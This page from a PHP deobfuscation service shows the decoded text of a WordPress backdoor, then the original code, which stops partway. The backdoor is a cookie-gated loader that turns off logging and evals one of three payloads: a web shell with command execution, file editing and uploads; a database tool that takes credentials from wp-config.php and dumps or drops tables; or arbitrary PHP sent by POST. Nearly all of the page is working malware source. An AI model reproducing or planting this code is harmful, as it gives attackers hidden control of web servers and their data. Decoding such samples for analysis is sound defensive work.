Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by unphp.net */ <?php if (!defined('985F9FCB')) { @error_reporting(0); ..

Decoded Output download

/* Decoded by unphp.net */ 
 
<?php if (!defined('985F9FCB')) { 
    @error_reporting(0); 
    @ini_restore("safe_mode"); 
    @ini_restore("open_basedir"); 
    @ini_restore("safe_mode_include_dir"); 
    @ini_restore("safe_mode_exec_dir"); 
    @ini_restore("disable_functions"); 
    @ini_restore("allow_url_fopen"); 
    @set_time_limit(0); 
    @ignore_user_abort(TRUE); 
    if (@function_exists('ini_set')) { 
        @ini_set('error_log', NULL); 
        @ini_set('log_errors', 0); 
        @ini_set('file_uploads', 1); 
        @ini_set('allow_url_fopen', 1); 
        @ini_set('max_execution_time', 0); 
        @ini_set('output_buffering', 0); 
    } else { 
        @ini_alter('error_log', NULL); 
        @ini_alter('log_errors', 0); 
        @ini_alter('file_uploads', 1); 
        @ini_alter('allow_url_fopen', 1); 
        @ini_alter('max_execution_time', 0); 
        @ini_alter('output_buffering', 0); 
    } 
    if (sha1(md5($_COOKIE['c3af998ac1e74b313410'])) == "2de93732a0ca61ff53abe2319bc059d06d195d6d") { 
        if ($_COOKIE['PREF'] == 1) eval(base64_decode("clearstatcache();
set_magic_quotes_runtime(0);
if(!function_exists('ini_set')){
function ini_set(){
return FALSE;
}
}
ini_set('output_buffering',0);
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
else $limit = get_cfg_var('max_execution_time');

if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}

if(@get_magic_quotes_gpc()){
foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists('exec')){
@exec($c, $out);
return @implode("\n", $out);
}elseif(function_exists('shell_exec')){
$out = @shell_exec($c);
return $out;
}elseif(function_exists('system')){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists('passthru')){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode('', $str);
}elseif(function_exists('curl_version')){
@ob_start();
$h = @curl_init('file:/'.'/'.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = 'Could not read file!';
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, 'w');
if($fp){
fwrite($fp, $c);
fclose($fp);
$out = 'File saved.'."\n";
if($t && touch($f, $t)){
$out .= 'Last modification time changed.';
}else{
$out .= 'Could not change last modification time!';
}
}else{
$out = 'Saving failed!';
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.'&nbsp;b';
elseif($size < 1048576) $size = round($size/1024*100)/100 . '&nbsp;Kb';
elseif($size < 1073741824) $size=round($size/1048576*100)/100 . '&nbsp;Mb';
return $size;
}

if(!function_exists('natcasesort')){
function natcasesort($arr){
return sort($arr);
}
}

if(!empty($_POST['dir'])){
$dir = $_POST['dir'];
if(!@chdir($dir)) $out = 'chdir() failled!';
}
$dir = getcwd();



(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix';

if(!$os_name = @php_uname()){
if(function_exists('posix_uname')){
$os_name = posix_uname();
}elseif($os_name != getenv('OS')){
$os_name = '';
}
}

if(function_exists('posix_getpwuid')){
$data = posix_getpwuid(posix_getuid());
$user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')';
}else{
$user = '';
}

$safe_mode = get_cfg_var('safe_mode');
$safe_mode ? $safe = 'on' : $safe = 'off';

execute('echo ssps') ? $execute = 'on' : $execute = 'off';




$server = getenv('SERVER_SOFTWARE');
if(!$server) $server = '---';



$out = '';
$tail = '';
$aliases = '';
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
}



if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

elseif(!empty($_POST['edit'])){
$file = $_POST['edit'];
$out = read($file);
$tail = '<input type="hidden" name="dir" value="'.$dir.'"><input type="hidden" name="efile" value="'.$file.'"><br><input type="submit" value="submit">';
}

elseif(!empty($_POST['save'])){
$out = write($_POST['efile'], $_POST['save']);
}

elseif(!empty($_POST['remove'])){
$obj = $_POST['remove'];
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
$res ? $out = 'Removed successfully' : $out = 'Removing failed!';
}

elseif(!empty($_POST['newdir'])){
@mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!';
}

elseif(!empty($_POST['newfile'])){
@touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!';
}

elseif(!empty($_POST['alias'])){
$out = execute($_POST['alias']);
}

elseif(!empty($_FILES['ufile']['tmp_name'])){
if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file';
else $out = 'Uploaded successfully.';
}

print<<<here
<style>
table {font:9pt Tahoma;border-color:white}
input,select,file {background-color:#eeeeee}
textarea {background-color:#f2f2f2}
</style>
<br>
<center>
<table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
<tr>
<td>
<form method="post">
<table cellpadding=1 cellspacing=0 border=1 width=650>
here;
if(!$safe_mode) print<<<here
<tr>
<td>
cmd
</td>
<td colspan=8>
<input type="text" name="cmd" size="97">
</td>
</tr>
here;
print<<<here
<tr>
<td>
php
</td>
<td colspan=8>
<input type="text" name="php" size="97">
</td>
</tr>
<tr>
<td>
actions
</td>
<td>
edit
</td>
<td>
<input type="text" name="edit" size="14">
</td>
<td>
remove
</td>
<td>
<input type="text" name="remove" size="14">
</td>
<td>
new_dir
</td>
<td>
<input type="text" name="newdir" size="14">
</td>
<td>
new_file
</td>
<td>
<input type="text" name="newfile" size="15">
</td>
</tr>
here;
if($aliases){
print<<<here
<tr>
<td>
aliases
</td>
<td colspan=8>
<select name=alias>
here;
foreach($aliases as $k => $v){
print '<option value="'.$v.'">'.$k.'</option>';
}
print<<<here


</select>
<input type="submit" value="submit">
</td>
</tr>
here;
}
print<<<here
<tr>
<td>
dir
</td>
<td colspan=8>
<input type="text" value="{$dir}" name="dir" size="89">
<input type="submit" value="submit">
</td>
</tr>
</form>
<form method="post" enctype="multipart/form-data">
<tr>
<td>
upload
</td>
<td colspan=8>
<input type="file" name="ufile" size="76">
<input type="hidden" name="dir" value="{$dir}">
<input type="submit" value="submit">
</td>
</tr>
</form>
</table>



<table cellpadding=0 cellspacing=0 border=1 width=650>
<form method="post">
<tr valign=top>
<td width=70% bgcolor=#dddddd>
<b>OS:</b> {$os_name}<br>
<b>User:</b> {$user}<br>
<b>Server:</b> {$server}<br>
<b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
</td>
<td rowspan=2 bgcolor=#dddddd>
<center>~:(expl0rer):~</center>
here;



if($dp = @openDir($dir)){
$cObj = readDir($dp);
while($cObj){
if(@is_dir($cObj)) $theDirs[] = $cObj;
elseif(@is_file($cObj)) $theFiles[] = $cObj;
$cObj = readDir($dp);
}
closedir($dp);
}

if(!empty($theDirs)){
natcasesort($theDirs);
if($os_type == 'nix'){
foreach($theDirs as $cDir){
$color='black';
if(is_writeable($cDir)){
$color='red';
}elseif(is_readable($cDir)){
$color='blue';
}
print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>";
}
}else{
foreach($theDirs as $cDir){
$tmp = $cDir.'/.ssps_tmp';
if(@touch($tmp)){
$color='red';
unlink($tmp);
}elseif(opendir($cDir)){
closedir();
$color='blue';
}else{
$color='black';
}
print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>";
}
}
} else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir');

print '<br>';

if(!empty($theFiles)){
natcasesort($theFiles);
print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
foreach($theFiles as $cFile){
$size = file_size($cFile);
if($fp = @fopen($cFile, 'a')) $color = 'red';
elseif($fp = @fopen($cFile, 'r')) $color='blue';
else $color = 'black';
@fclose($fp);
print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>';
}
print '</table>';
}

print<<<here
</td>
</tr>
<tr valign=top>
<td align=center>
<form method="post">
~:(results):~
<textarea name=save cols=55 rows=15>{$out}</textarea>
{$tail}
</form>
</td>
</tr>

</table>
</form>
</td>
</tr>
</table>
here;
die;")); 
        if ($_COOKIE['PREF'] == 2) eval(base64_decode("$allowed_ips = array( 	'192.168.1.*', );

$real_office_login = 'login';
$real_office_password = 'password';

$svoi = 0;
foreach($allowed_ips as $pattern){
	$pattern = str_replace(".","\.", $pattern);	$pattern = str_replace("?",".",$pattern);	$pattern = str_replace("*",".*",$pattern);
	if(preg_match("/".$pattern."/iU", $_SERVER['REMOTE_ADDR'])) $svoi=1;
}

if($svoi>0){
	$in_office = 1;
	$office_login = $real_office_login;
	$office_password = $real_office_password;
}

error_reporting(0);
set_time_limit(0);
if($_GET['iof']){$iof = array(
        'd'=>'R0lGODlhDwANAKIAAAAAAMzMzMwzAP+ZAEIRAP///wAAAAAAACH5BAUUAAUALAAAAAAPAA0AAAM3WEXQDiSyJUi4l4hdwbYAplXdF4QZV1anqDImFoyfV0nSa6t8vQ3A4EDXK8IEwiCxyGPgnjhAAgA7',
        's'=>'R0lGODlhDwANAKIAAP///8zMzACZzAAAZgAAAAAAAAAAAAAAACH5BAUUAAAALAAAAAAPAA0AAAMxCEDc3kuQQCkRWF4ZpsUXA3bVBm6T12XaWK2ZqD2szN4nNuz8UJu4n663EwZvj+QjAQA7',
        );header("Content-type: image/png\nCache-control: public\n\rExpires: Thu, 1 Jan 2037 00:00:00 +0200\n\rCache-control: max-age=605800\n\rLast-Modified: ".date("r",filemtime(__FILE__)));echo base64_decode($iof[$_GET['iof']]);exit;
}

$indexphp = basename($_SERVER['PHP_SELF']);
$db_host = $_REQUEST['db_host'];
$db_user = $_REQUEST['db_user'];
$db_pass = $_REQUEST['db_pass'];
$db_base = $_REQUEST['db_base'];
if($_REQUEST['db_base_plain']) $db_base = $_REQUEST['db_base_plain'];

if($_GET['auto']!="off"){
	$wpconf=fwpconf("./");
	if($db_host=="" && $db_user=="" && $db_pass=="" && $db_base=="" && ($txt=@file_get_contents($wpconf."wp-config.php"))!=""){
		$txt=preg_replace("!\s+!is"," ",$txt);
		preg_match("!define\s?\(\s?['\"]DB_NAME['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbn);
		preg_match("!define\s?\(\s?['\"]DB_USER['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbu);
		preg_match("!define\s?\(\s?['\"]DB_PASSWORD['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbp);
		preg_match("!define\s?\(\s?['\"]DB_HOST['\"]\s?,\s?['\"](.*?)['\"]\s?\);!is",$txt,$dbh);
		if($dbh[1]==""){
			preg_match("!define\s?\(\s?['\"]DB_HOST['\"]\s?,\s?(.*?)\s?\);!is",$txt,$dbh);
			eval("\$dbh[1]=".$dbh[1].";");
		}
		$db_host = $dbh[1];
		$db_user = $dbu[1];
		$db_pass = $dbp[1];
		$db_base = $dbn[1];
		
		echo $db_host."<br>".$db_user."<br>".$db_pass."<br>".$db_base."<br>";
	}
}

$sv_s = true; $drp_tbl = true;

function sqldumptable($table){
        global $sv_s,$sv_d,$drp_tbl,$db_link;
        if ($sv_s) { if ($drp_tbl) $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; $tabledump .= "CREATE TABLE `$table` (\n"; $firstfield=1; $champs = mysql_query("SHOW FIELDS FROM `$table`",$db_link);        while ($champ = mysql_fetch_array($champs)){ if (!$firstfield){$tabledump .= ",\n";} else        $firstfield=0; $tabledump .= "   `$champ[Field]` $champ[Type]"; if ($champ['Null'] != "YES")$tabledump .= " NOT NULL"; if (!empty($champ['Default'])) $tabledump .= " default '$champ[Default]'"; if ($champ['Extra'] != "") $tabledump .= " $champ[Extra]";}        @mysql_free_result($champs); $keys = mysql_query("SHOW KEYS FROM `$table`",$db_link);         while ($key = mysql_fetch_array($keys)){ $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) $kname="UNIQUE|`$kname`"; if(!is_array($index[$kname])) $index[$kname] = array(); $index[$kname][] = $key['Column_name']; }        @mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if($kname == "PRIMARY") $tabledump .= "   PRIMARY KEY (`".eregi_replace(',','`,`',$colnames)."`)"; else { if (substr($kname,0,6) == "UNIQUE") $kname=substr($kname,7); $tabledump .= "   KEY $kname (`".eregi_replace(',','`,`',$colnames)."`)"; } }        $tabledump .= "\n);\n\n";        }
        if ($sv_d) { $rows = mysql_query("SELECT * FROM `$table`",$db_link); $numfields = mysql_num_fields($rows);        while ($row = mysql_fetch_array($rows))        { $tabledump .= "INSERT INTO `$table` VALUES("; $cptchamp=-1; $firstfield=1; while (++$cptchamp<$numfields) { if (!$firstfield) $tabledump.=","; else $firstfield=0; if (!isset($row[$cptchamp])) $tabledump .= "NULL"; else $tabledump .= "'".mysql_escape_string($row[$cptchamp])."'";        } $tabledump .= ");\n";        }        @mysql_free_result($rows);        }
        $fff = fopen("dump.sql","w+"); fwrite($fff,$tabledump);        return $tabledump;
}

function fwpconf($d){
	global $irec;
	if($irec++>10) return FALSE;
	$d=str_replace("//","/",$d);
	if($dir=@opendir($d)){
		while(($f=@readdir($dir))!==false){
			if($f=="." || $f==".." || is_link($f)) continue;
			if($f=="wp-config.php") break;
		}
		if($f!="wp-config.php") $d=fwpconf("../".$d);
	}
	@closedir($dir);
	return $d;
}

global $db_link;

if ($_REQUEST[act]=='dump_tb_all' || $_REQUEST[act]=='dump_tb_structure') {
        if ($_REQUEST[act]=='dump_tb_all') $sv_d=true;
	$db_link=mysql_connect($db_host,$db_user,$db_pass);
        if(!$db_link)die('Error connecting to SQL server');
        if($db_base) mysql_select_db($db_base,$db_link);
        print "<pre style=\"font-size:10;font-family:Verdana;\">".htmlspecialchars(sqldumptable($_REQUEST[table]))."</pre>";
        $_REQUEST[act] == '';
        die;
}
if ($_REQUEST[act]=='dump_db_all' || $_REQUEST[act]=='dump_db_structure') {
        if ($_REQUEST[act]=='dump_db_all') $sv_d=true;
	$db_link=mysql_connect($db_host,$db_user,$db_pass);
        if(!$db_link)die('Error connecting to SQL server');
        if($db_base) mysql_select_db($db_base,$db_link);
        $q = mysql_query("SHOW TABLES",$db_link);
        print "<pre style=\"font-size:10;font-family:Verdana;\">";
        while($data = mysql_fetch_row($q)) print htmlspecialchars(sqldumptable($data[0]))."\n";
        print "</pre>";
        die;
}

print<<<here
<html>
<head>
<meta http-equiv="expires" content="0">
<meta http-equiv='Content-Type' content='text/html; charset=windows-1252'>
<style type="text/css">
td,body { font-family:Verdana;font-size:13px;}
table, td, th { border-color: #EEEEEE #CCCCCC #CCCCCC #EEEEEE; border-style: solid; border-width: 1px; background-color:#FFFFFF;}
.nob { border:none; border-color:#ffffff;font-weight:bold;font-size:10px;}
th{color: #FFFFFF; background-color: #3366CC;font-size:10pt;font-weight:bold;text-align:left;}
.th1{color: #FFFFFF; background-color: #3366CC;font-size:10pt;font-weight:bold;text-align:center;}
.thc {background-color:#3366CC;font-weight:bold;color:#ffffff;text-align:center;}
.thl {background-color:#eaeaea;font-weight:bold;text-align:left;}
.thr {background-color:#eaeaea;font-weight:bold;font-size:10px;text-align:right;}
.an { color:#0000ff; text-decoration:underline; }
input, textarea, select{font-family: Verdana,Arial,Helvetica; font-size: 11px;}
</style>
here;

if(!$db_host || !$db_base){
print "
</head><body bgcolor=#FFFFFF><center><table border=1 cellpadding=2><form action=".$indexphp." method=POST><tr><th colspan=2>Fill database data:</th></tr>
<tr bgcolor=#E0E0E0><td class=thr>Host:</td><td><input type=text name=db_host value='localhost' style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=thr>Username:</td><td><input type=text name=db_user value='root' style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=thr>Password:</td><td><input type=password name=db_pass style='width:140px'".(($in_office)?" value='$office_password'":"")."></td></tr>";

    if($in_office) $db_link=@mysql_connect('localhost',$office_login,$office_password);
    $db_list = mysql_list_dbs($db_link);
    if((!mysql_error($db_link)) && mysql_num_rows($db_list)>0) {
                   echo "<tr bgcolor=#E0E0E0><td class=thr valign=top".(($db_host)?" style='color:#FF0000'":"").">Select database:</td><td>\n".
			"<select size=20 name=db_base style='width:250px'>"; $rows = '';
                   while ($row = mysql_fetch_object($db_list)) $rows = "<option value='".$row->Database."'>".$row->Database."</option>".$rows;
                   echo $rows."</select>\n</td></tr>";
                   $dblisted=1;
    }
                @mysql_close($db_link);
echo "
<tr bgcolor=#E0E0E0><td class=thr valign=top".(($db_host)?" style='color:#FF0000'":"").">".(($dblisted==1)?"OR d":"D")."atabase:</td><td><input type=text name=db_base_plain style='width:140px'></td></tr>
<tr bgcolor=#E0E0E0><td class=th1 colspan=2><input type=submit value='Login >>'></td></tr></form></table></center></body></html>";
exit;
}

$query = $_REQUEST['query'];
if(!$query)$query = "show tables";
$history = $_REQUEST['history'];
if($history) { $history = explode(" ", trim($history)); foreach($history as $hk=>$h) if($h) $history[$hk] = str_replace("bla_SPACE_bla"," ",$h);}
if(!count($history)) $history[]="show tables";
$db_link=mysql_connect($db_host,$db_user,$db_pass);
if(!$db_link)die('Error connecting to SQL server');

$js_history=""; foreach($history as $h) $js_history='"'.$h.'",';
$count_history=count($history);
print<<<here
<script language=JavaScript>
var brnm=navigator.appName;
ie=0;
if (brnm=="Microsoft Internet Explorer") ie=1;

 var history_=new Array({$js_history}"");

var inHist={$count_history},hLen={$count_history};



function setHistButtons(){

	if (ie) {
		document.getElementById("f1").h_back.disabled= (inHist==0);
		document.getElementById("f1").h_forw.disabled=(inHist>={$count_history}-1);
	}
	if (!ie) {
		if (inHist==0) document.getElementById("f1").h_back.disabled = true;
			else document.getElementById("f1").h_back.disabled = false;
		if (inHist>={$count_history}-1) document.getElementById("f1").h_forw.disabled= true;
			else document.getElementById("f1").h_forw.disabled= false;
	}
}

function hi_back(){
	document.getElementById("f1").query.value=history_[--inHist];
	setHistButtons();
}

function hi_forw(){
	document.getElementById("f1").query.value=history_[++inHist];
	setHistButtons(); 
}

function init(){
	frm.query.focus(); 
	setHistButtons();
}

function prepare(){
	var i,j,h,s=''; 
	var regexp = /\s/;
    for(i=0;i<history_.length;i++) 
    	if(history_[i].length){
    		h=history_[i];
    		while(h.search(regexp)!=-1) 
    			h = h.replace(regexp, "bla_SPACE_bla");
    			s+=h+" ";
    	}
    var q = document.getElementById("f1").query.value; 
    while(q.search(regexp)!=-1) 
    	q = q.replace(regexp, "bla_SPACE_bla");
    document.getElementById("f1").history.value=s+q;
}

function submit_form(){
	if(document.getElementById("f1").Submit) 
		document.getElementById("f1").Submit(); 
	else document.getElementById("f1").submit();
}

function dump_tb_structure(p){
	document.getElementById("f1").act.value='dump_tb_structure';
	document.getElementById("f1").table.value=p;
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_tb_all(p){
	document.getElementById("f1").act.value='dump_tb_all';
	document.getElementById("f1").table.value=p;
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_db_structure(){
	document.getElementById("f1").act.value='dump_db_structure';
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function dump_db_all(){
	document.getElementById("f1").act.value='dump_db_all';
	prepare();
	document.getElementById("f1").target='_blank';
	document.getElementById("f1").submit();
	document.getElementById("f1").target='_self';
	document.getElementById("f1").act.value=0; 
	return false; 
}

function go(p){
	document.getElementById("f1").query.value='select * FROM `'+p+'`';
	prepare();
	submit_form(); 
	return false;
}

function drop(p){
	document.getElementById("f1").query.value='drop table `'+p+'`';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function desc(p){
	document.getElementById("f1").query.value='describe `'+p+'`';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}
	
function showt(){
	document.getElementById("f1").query.value='show tables';
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function rep(){
	document.getElementById("f1").query.value=history_[hLen-1];
	prepare();
	document.getElementById("f1").submit();
	return false; 
}

function inte(o){
        var v = document.getElementById("f1").query.value,t;
        if( o == 'simple' ) t = '<input type=text name=query size=75 value="'+v+'">';
        if( o == 'multiline' ) t = '<textarea name=query cols=75 rows=15>'+v+'</textarea>';
        if( o == 'upload' ) t = '<input type=file name=query size=65>';
        document.all['queryline'].innerHTML = t;
}
</script></head>
<body onLoad="init();" bgcolor=#ffffff alink=#0000ff vlink=#0000ff>
<center>
<table border=0 cellpadding=2 cellspacing=0 class=nob>
<form method=POST>
<tr><td class=nob>Current database: 
 <select name=db_base size=1 onchange='submit();'>
here;

$db_list = mysql_list_dbs($db_link);
$rows=''; 
while ($row = mysql_fetch_object($db_list)) 
	$rows = "<option ".($db_base==$row->Database?"selected":"")." value='".$row->Database."'>".$row->Database."</option>\n".$rows;
echo $rows."</select>\n<input type=hidden name=db_host value=".$db_host.">
						<input type=hidden name=db_user value=".$db_user.">
						<input type=hidden name=db_pass value=".$db_pass.">";
print<<<here
<select onchange="inte(this.value)">
<option value='simple'>Simple
<option value='multiline'>Multiline
<option value='upload'>Upload
</select>
</td></tr></form>
<form id=f1 name=frm method=POST onsubmit='prepare();submit();' target=_self  enctype="multipart/form-data">
<input type=hidden name=act><input type=hidden name=table value=0>
<tr><td class=nob><div id=queryline><input type=text name=query size=75></div></td><td class=nob valign=top>
<input name=h_back type=button value='<' onclick='hi_back();'>
<input name=h_forw type=button value='>' onclick='hi_forw();'>
&nbsp;<input type=button value=Submit onclick='prepare();submit();'>
<input type=hidden name=db_host value={$db_host}>
<input type=hidden name=db_user value={$db_user}>
<input type=hidden name=db_pass value={$db_pass}>
<input type=hidden name=db_base value={$db_base}>
<input type=hidden name=history value=''>
</td></tr>
<tr><td class=nob>
<a href=# style='color=#0000ff' onClick='return dump_db_all()'><img border=0 src=csql.php?iof=d alt='Dump database'  align='absmiddle'></a>&nbsp;
<a href=# style='color=#0000ff' onClick='return dump_db_structure()'><img border=0 src=csql.php?iof=s alt='Dump structure'  align='absmiddle'></a>&nbsp;
[<a href=# style='color=#0000ff' onClick='return(rep())'>Repeat query</a>]&nbsp;
[<a href=# style='color=#0000ff' onClick='return(showt())'>Show tables</a>]&nbsp;
[<a href={$indexphp}>Re-Login</a>]
</td></tr>
</form>
</table><br>
here;

if( $_FILES['query']['tmp_name'] ){
        $query = file( $_FILES['query']['tmp_name'] );
} else $query = explode("\n", stripslashes($query));

$queries = array();
$skoko = count($query);

foreach($query as $key=>$v){
        $v=trim($v);
        if(substr($v,0,1)!='#'){
                if(substr($v,-1,1) != ';' && $key!=$skoko-1) $f1.=$v;
                else {
                        if($f1=="") $f1=$v; else $f1.=$v;
                        if(substr($v,-1,1) == ';') $qq = substr($f1,0,-1);
                        else $qq = $f1;
                        if(trim($qq)) $queries[]= $qq;
                        $f1="";
                }
        }
}

if($db_base) mysql_select_db($db_base,$db_link);
if(mysql_error($db_link)) $no_base=1;

$colors = array('red','green','blue');
foreach($queries as $ttt=>$q){
        unset($tv1,$i,$d,$w,$t,$r,$t1,$a,$b);

        if(eregi("^use ",$q))$db_base=substr($q,4);
        if(eregi('show tables',$q))$tv1=1;

        if($q){
          echo '<table class=nob cellpadding=0 cellspacing=0><tr><td style="background-color:#ffffaa;padding:4px;border:1px dashed #aaaaaa">'.htmlspecialchars($q).'</td></tr></table><br><br>';
                 $w=mysql_query($q,$db_link);
          if(mysql_error($db_link) || $no_base) echo "<font color=#ff0000><b>MySQL error:</b></font> ".mysql_error($db_link);
          if($w){
            echo'<table width=100% cellpadding=2 cellspacing=2 bordercolor=#bbbbbb border=0><tr align=center>';
            $i=0;
            if($tv1!=1) while($a=mysql_field_name($w,$i++)){
                                                                                echo"<td class=thc><i>$a</i></td>";
                                                                                $d[]=$a;
                                                            }
            else echo "<td colspan=2 class=thc>Tables in <b>\"".$db_base."\"</b></td>";
            echo'</tr>';
            while($a=mysql_fetch_array($w)){
              echo"<tr>\n";
              if($tv1) {
                              $t=$a[0];
                              echo "<td class=thr nowrap>";
                              $r = mysql_query("SELECT COUNT(*) FROM $t",$db_link);
                              $r =  mysql_result($r,0);
                              echo "&nbsp<a href=# onClick=\"return dump_tb_all('".$t."');\" style=\"color: green\"><img border=0 src=csql.php?iof=d alt=\"Dump table\" align='absmiddle'></a>&nbsp<a href=# onClick=\"return dump_tb_structure('".$t."');\" style=\"color: green\"><img border=0 src=csql.php?iof=s alt=\"Dump structure\" align='absmiddle'></a>&nbsp;[<a href=# onClick=\"return( confirm('Delete table \'".$t."?\'')? drop('".$t."'):false )\" style=\"color:#ff0000\">kill</a>]&nbsp;[<a href=# onClick=\"return desc('".$t."');\">desc</a>]</td><td width=100% valign=top>&nbsp;<a href=# onClick=\"go('".$t."');return false;\">".$t."</a> <font style=\"font-size:10;color: #aaaaaa;\">(".$r.")</font></td>";
              }
              reset($d);
              while ($b=each($d)){
                      $t=$a[$b[1]]; echo'<td valign=top>';
                $t1=nl2br(htmlspecialchars(stripslashes($t)));
                if($t1=="")$t1="&nbsp;";
                echo $t1."</td>";
              }
              print("</tr>\n");
            }
            echo'</table>';
          }
           if($ttt < count($queries)-1) echo "<br><br>";
        }
}
print<<<here
</center>
</body>
</html>
here;
die;")); 
        if ($_COOKIE['PREF'] == 3 && $_POST['file'] != "") eval(base64_decode($_POST['file'])); 
    } 
    $_x = get_option("d20dde6358dceef51157999bac1a2eaf"); 
    $_x = base64_decode(str_rot13($_x)); 
    print($_x); 
    define('985F9FCB', 1); 
} ?>

Did this file decode correctly?

Original Code

/* Decoded by unphp.net */

<?php if (!defined('985F9FCB')) {
    @error_reporting(0);
    @ini_restore("safe_mode");
    @ini_restore("open_basedir");
    @ini_restore("safe_mode_include_dir");
    @ini_restore("safe_mode_exec_dir");
    @ini_restore("disable_functions");
    @ini_restore("allow_url_fopen");
    @set_time_limit(0);
    @ignore_user_abort(TRUE);
    if (@function_exists('ini_set')) {
        @ini_set('error_log', NULL);
        @ini_set('log_errors', 0);
        @ini_set('file_uploads', 1);
        @ini_set('allow_url_fopen', 1);
        @ini_set('max_execution_time', 0);
        @ini_set('output_buffering', 0);
    } else {
        @ini_alter('error_log', NULL);
        @ini_alter('log_errors', 0);
        @ini_alter('file_uploads', 1);
        @ini_alter('allow_url_fopen', 1);
        @ini_alter('max_execution_time', 0);
        @ini_alter('output_buffering', 0);
    }
    if (sha1(md5($_COOKIE['c3af998ac1e74b313410'])) == "2de93732a0ca61ff53abe2319bc059d06d195d6d") {
        if ($_COOKIE['PREF'] == 1) eval(base64_decode("clearstatcache();
set_magic_quotes_runtime(0);
if(!function_exists('ini_set')){
function ini_set(){
return FALSE;
}
}
ini_set('output_buffering',0);
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
else $limit = get_cfg_var('max_execution_time');

if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}

if(@get_magic_quotes_gpc()){
foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists('exec')){
@exec($c, $out);
return @implode("\n", $out);
}elseif(function_exists('shell_exec')){
$out = @shell_exec($c);
return $out;
}elseif(function_exists('system')){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists('passthru')){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode('', $str);
}elseif(function_exists('curl_version')){
@ob_start();
$h = @curl_init('file:/'.'/'.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = 'Could not read file!';
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, 'w');
if($fp){
